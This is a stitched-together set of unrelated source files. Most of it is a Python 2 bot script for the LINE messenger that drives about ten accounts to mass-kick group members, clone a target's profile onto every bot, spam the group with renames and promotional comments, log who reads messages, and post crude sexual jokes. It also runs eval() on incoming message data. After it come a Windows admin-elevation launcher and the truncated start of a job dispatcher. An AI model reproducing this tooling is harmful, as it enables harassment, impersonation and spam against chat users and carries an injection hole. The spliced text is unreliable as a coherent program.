cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#=======================================
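# "Backup" re-applies the saved `backup` profile object (name/status/picture) to every
# bot account, "Copy @name" clones the target's profile onto all bots via
# CloneContactProfile, and "Kembali awal" restores the saved backup per bot.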
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
ki.updateDisplayPicture(backup.pictureStatus)
kk.updateDisplayPicture(backup.pictureStatus)
kc.updateDisplayPicture(backup.pictureStatus)
ks.updateDisplayPicture(backup.pictureStatus)
k1.updateDisplayPicture(backup.pictureStatus)
k2.updateDisplayPicture(backup.pictureStatus)
k3.updateDisplayPicture(backup.pictureStatus)
k4.updateDisplayPicture(backup.pictureStatus)
k5.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateProfile(backup)
kk.updateProfile(backup)
kc.updateProfile(backup)
ks.updateProfile(backup)
k1.updateProfile(backup)
k2.updateProfile(backup)
k3.updateProfile(backup)
k4.updateProfile(backup)
k5.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
k1.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
ki.sendText(msg.to, str(e))
kk.sendText(msg.to, str(e))
kc.sendText(msg.to, str(e))
ks.sendText(msg.to, str(e))
k1.sendText(msg.to, str(e))
k2.sendText(msg.to, str(e))
k3.sendText(msg.to, str(e))
k4.sendText(msg.to, str(e))
k5.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
k1.CloneContactProfile(target)
k2.CloneContactProfile(target)
k3.CloneContactProfile(target)
k4.CloneContactProfile(target)
k5.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali awal"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
k1.updateDisplayPicture(backup.pictureStatus)
k1.updateProfile(backup)
k2.updateDisplayPicture(backup.pictureStatus)
k2.updateProfile(backup)
k3.updateDisplayPicture(backup.pictureStatus)
k3.updateProfile(backup)
k4.updateDisplayPicture(backup.pictureStatus)
k4.updateProfile(backup)
k5.updateDisplayPicture(backup.pictureStatus)
k5.updateProfile(backup)
cl.sendText(msg.to, "Backup Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
ki.sendText(msg.to, str (e))
kk.sendText(msg.to, str (e))
kc.sendText(msg.to, str (e))
ks.sendText(msg.to, str (e))
k1.sendText(msg.to, str (e))
k2.sendText(msg.to, str (e))
k3.sendText(msg.to, str (e))
k4.sendText(msg.to, str (e))
k5.sendText(msg.to, str (e))
#--------------------------------------------------------
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u6fb1bd6b5af0f27bbdb88ecb6a1468c0'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"Itu Creator Kami Yang Manis Kalem 😜\nSmule : @FS3i_Kris_S1H\nNama : Kris\nZodiak : Cancer")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "kedapkedip " in msg.text.lower():
if msg.from_ in admin:
txt = msg.text.replace("kedapkedip ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in owner:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat Finish")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in owner:
if 'MENTION' in msg.contentMetadata:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
random.choice(KAC).kickoutFromGroup(msg.to,[mention['M']])
#===========================================
elif "Searchid: " in msg.text:
if msg.from_ in admin:
msgg = msg.text.replace('Searchid: ','')
conn = cl.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
kk.sendMessage(msg)
#===========================================
elif "megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("megs ","")
ap = random.choice(KAC).getGroups([msg.to])
semua = [contact.mid for contact in ap[0].members]
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
random.choice(KAC).createGroup(gName, semua)
#cl.leaveRoom(op.param1)
#cl.leaveGroup([msg.to])
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
# if op.param1 in autocancel:
# OWN = "ua7fc5964d31f45ac75128fc2b8deb842","u406133ad4d3fbe50a2f4d51ea081d050","ua51ba06b0dd18c0bfe2cc6caa3458202","uc7f32bb28dc009916d40af87c9910ddc"
# if op.param2 in OWN:
# pass
# else:
# Inviter = op.param3.replace("",',')
# InviterX = Inviter.split(",")
# contact = cl.getContact(op.param2)
# cl.cancelGroupInvitation(op.param1,InviterX)
# ki.cancelGroupInvitation(op.param1,InviterX)
# kk.cancelGroupInvitation(op.param1,InviterX)
# ks.cancelGroupInvitation(op.param1,InviterX)
# kc.cancelGroupInvitation(op.param1,InviterX)
# ka.cancelGroupInvitation(op.param1,InviterX)
# cl.kickoutFromGroup(op.param1,[op.param2])
# ki.kickoutFromGroup(op.param1,[op.param2])
# kk.kickoutFromGroup(op.param1,[op.param2])
# ks.kickoutFromGroup(op.param1,[op.param2])
# kc.kickoutFromGroup(op.param1,[op.param2])
# ka.kickoutFromGroup(op.param1,[op.param2])
# wait["blacklist"][op.param2] = True
# f=codecs.open('st2__b.json','w','utf-8')
# json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots or op.param2 in admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
# if op.type == 26:
# if "@"+cl.getProfile().displayName in msg.text:
# tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
# jawab = ("Jgn Tag Gw woyy!!\nlagi ngocok dulu...!!!","Berisik jgn tag Gw Koplak","Gw Sibuk, Gausah di Tag!!!","Ngapain tag neh,, kangen yah...!!!")
# jawaban = random.choice(jawab)
# cl.sendText(msg.to,jawaban)
elif "@"+cl.getProfile().displayName in msg.text:
try:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = ("Jgn Tag Si "+cl.getProfile().displayName+"Ta cipok luh..!!","Berisik jgn tag si "+cl.getProfile().displayName+" dia lagi asyik ngocok...!!!")
jawaban = random.choice(jawab)
random.choice(KAC).sendText(msg.to,jawaban)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
except:
pass
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
pass  # chat is not being monitored
except:
pass
#---------------------
# if op.type == 17:
# if op.param2 in Bots:
# return
# ginfo = cl.getGroup(op.param1)
# random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
# random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
# random.choice(KAC).sendText(op.param1, "😊 Semoga Betah Kk 😘\nNo Baper,No nakal,No Ngeyel ya,No Bulshit")
# print "MEMBER HAS JOIN THE GROUP"
# if op.type == 15:
# if op.param2 in Bots:
# return
# random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v\nBelum di Anu Kayanya 😊")
# print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
# if 'MENTION' in mid or Amid or Bmid or Cmid or Dmid or Emid or Fmid or Gmid or Hmid or Imid:
# cl.sendtext(msg.to,'[Auto Respon]\nngapain tag, pc langsung aja...!!!')
# pass
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
import os
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
print("Working directory:", dname)
os.chdir(dname)
from Server.server import Server
import subprocess
import sys
import threading
import ctypes
def run_as_admin(argv=None, debug=False):
shell32 = ctypes.windll.shell32
if argv is None and shell32.IsUserAnAdmin():
return True
if argv is None:
argv = sys.argv
if hasattr(sys, '_MEIPASS'):
# Support pyinstaller wrapped program.
arguments = argv[1:]
else:
arguments = argv
argument_line = u' '.join(arguments)
executable = sys.executable
ret = shell32.ShellExecuteW(None, u"runas", executable, argument_line, None, 1)
if int(ret) <= 32:
return False
return None
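# Note added for clarity (the helper above is unchanged): run_as_admin() returns
# True when the process already has admin rights, False when the UAC elevation
# request fails, and None when a new elevated copy of the program was launched.
# A hypothetical caller would typically exit the non-elevated process after a
# successful relaunch, e.g.:
#
#     status = run_as_admin()
#     if status is None:       # an elevated copy was spawned
#         sys.exit(0)          # let the elevated copy take over
#     elif status is False:
#         print("Elevation was refused; continuing without admin rights.")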
def runAnalyzer():
proc = subprocess.Popen([sys.executable, "Static/analyzer.py"], shell=False)
proc.communicate()
#shell32 = ctypes.windll.shell32
#ret = shell32.ShellExecuteW(None, u"runas", sys.executable, "Static/analyzer.py", None, 1)
if __name__ == "__main__":
if os.name == 'nt':
# Elevation is only needed on Windows; skip on other platforms
run_as_admin()
threading.Thread(target=runAnalyzer).start()
server = Server(ip='127.0.0.1', port=8888)
server.run()
|
dispatcher.py
|
import threading
import logging
import queue
import time
import Pyro4
class Job(object):
def __init__(self, id, **kwargs):
self.id = id
self.kwargs = kwargs
self.timestamps = {}
self.result = None
self.exception = None
self.worker_name = None
def time_it(self, which_time):
self.timestamps[which_time] = time.time()
def __repr__(self):
return(
"job_id: " + str(self.id) + "\n" +
"kwargs: " + str(self.kwargs) + "\n" +
"result: " + str(self.result) + "\n" +
"exception: " + str(self.exception) + "\n"
)
def recreate_from_run(self, run):
run.config_id
run.budget
run.error_logs
run.loss
run.info
run.time_stamps
class Worker(object):
def __init__(self, name, uri):
self.name = name
